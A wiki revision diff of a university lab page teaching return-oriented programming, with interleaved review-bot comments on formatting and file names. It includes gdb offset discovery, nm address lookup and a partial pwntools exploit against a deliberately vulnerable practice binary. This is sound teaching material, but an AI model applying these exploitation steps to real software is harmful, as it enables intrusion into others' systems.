This shows you the differences between two versions of the page.
cns:labs:lab-09 [2020/12/14 16:39] mihai.dumitru2201 [Supporting files] |
cns:labs:lab-09 [2022/12/05 13:36] (current) mihai.dumitru2201 [Tasks] |
||
---|---|---|---|
Line 1: | Line 1: | ||
- | ====== Lab 09 - Return Oriented Programming (Part 2) ====== | + | ====== Lab 09 - Return-Oriented Programming (Part 2) ====== |
- | + | ||
- | ===== Resources ===== | + | |
- | + | ||
- | * [[http://neilscomputerblog.blogspot.ro/2012/06/stack-pivoting.html|More about stack pivoting and creating a "fake stack"]] | + | |
===== Introduction ===== | ===== Introduction ===== | ||
Line 34: | Line 29: | ||
===== Tasks ===== | ===== Tasks ===== | ||
+ | |||
+ | All content necessary for the CNS laboratory tasks can be found in [[cns:resources:repo|the CNS public repository]]. | ||
+ | |||
+ | |||
==== 1. Return to main ==== | ==== 1. Return to main ==== | ||
- | Inspect the source file ''task1.c''. See if you can spot the vulnerability. | + | Inspect the source file ''ret_to_main.c''. See if you can spot the vulnerability. |
The goal of the task is to get the contents of the ''flag'' file through the binary. In order to do this, we need to chain three functions together. | The goal of the task is to get the contents of the ''flag'' file through the binary. In order to do this, we need to chain three functions together. | ||
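Review bot: the new sentence pointing students at the CNS public repository is followed by two empty rows (`+ | |||` twice) where the rest of the page uses a single blank line between a paragraph and the next heading; dropping one of them keeps the spacing consistent. The rename of `task1.c` to `ret_to_main.c` in the same hunk should be checked against the actual file name in that repository, since the text now tells students to inspect a file by name.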
Line 44: | Line 43: | ||
<code asm> | <code asm> | ||
- | # gdb ./task1 | + | # gdb ./ret_to_main |
gdb-peda$ pattc 0x40 | gdb-peda$ pattc 0x40 | ||
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH' | 'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAH' | ||
gdb-peda$ r | gdb-peda$ r | ||
- | Starting program: /cns/lab-11/sol/task1 | + | Starting program: /cns/lab-11/sol/ret_to_main |
Welcome to our Retired Old Programmers message board! | Welcome to our Retired Old Programmers message board! | ||
Please leave a message: | Please leave a message: | ||
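Review bot: the rename in the gdb transcript is only half applied: the `Starting program:` line now reads `/cns/lab-11/sol/ret_to_main`, so the binary name was updated but the directory still says `lab-11` on a page that is `lab-09`. Either re-capture the transcript from the lab-09 solution directory or edit the directory as well, so students who compare their own output against the page are not confused by a path that does not exist in this lab.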
Line 100: | Line 99: | ||
</code> | </code> | ||
- | Our $rbp is at offset 48 => the return address will be at offset 56. | + | Our ''$rbp'' is at offset 48 => the return address will be at offset 56. |
=== Tutorial: Opening the flag file and returning to main === | === Tutorial: Opening the flag file and returning to main === | ||
Line 112: | Line 111: | ||
We'll need to save a few useful addresses: | We'll need to save a few useful addresses: | ||
<code bash> | <code bash> | ||
- | # nm task1 | egrep "main|stop|right|there|play" | + | # nm ret_to_main | egrep "main|stop|right|there|play" |
| | ||
00000000004012b5 T main | 00000000004012b5 T main | ||
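Review bot: `nm ret_to_main | egrep "main|stop|right|there|play"` uses `egrep`, which current GNU grep marks as obsolescent and warns about; `nm ret_to_main | grep -E "main|stop|right|there|play"` gives the same result without the warning and is the form students should copy. The empty row before `00000000004012b5 T main` also looks like stray whitespace from the paste rather than real `nm` output and can be dropped.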
Line 128: | Line 127: | ||
from pwn import * | from pwn import * | ||
- | io = process('./task1') | + | io = process('./ret_to_main') |
# Useful values | # Useful values | ||
Line 158: | Line 157: | ||
<code bash> | <code bash> | ||
# ./test.py | # ./test.py | ||
- | [+] Starting local process './task1': Done | + | [+] Starting local process './ret_to_main': Done |
[*] Switching to interactive mode | [*] Switching to interactive mode | ||
-> secret vault opened | -> secret vault opened | ||
Line 164: | Line 163: | ||
Please leave a message: | Please leave a message: | ||
$ | $ | ||
- | [*] Stopped program './task1' | + | [*] Stopped program './ret_to_main' |
</code> | </code> | ||
Line 323: | Line 322: | ||
Now you are set to write a fully working ropchain to sequentially call the three functions in order to open, read and print the contents of the flag file. | Now you are set to write a fully working ropchain to sequentially call the three functions in order to open, read and print the contents of the flag file. | ||
+ | ===== Resources ===== | ||
+ | |||
+ | * [[http://neilscomputerblog.blogspot.ro/2012/06/stack-pivoting.html|More about stack pivoting and creating a "fake stack"]] |
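Review bot: moving the Resources section from the top of the page to after the Tasks is fine, but the relocated link still points at `http://neilscomputerblog.blogspot.ro/...` over plain HTTP; Blogger-hosted sites are served over HTTPS, so switching the scheme to `https://` avoids sending students to a cleartext page from a security course. Since this is the only entry in the section, it may also be worth checking that the `.ro` host still resolves before the page goes live.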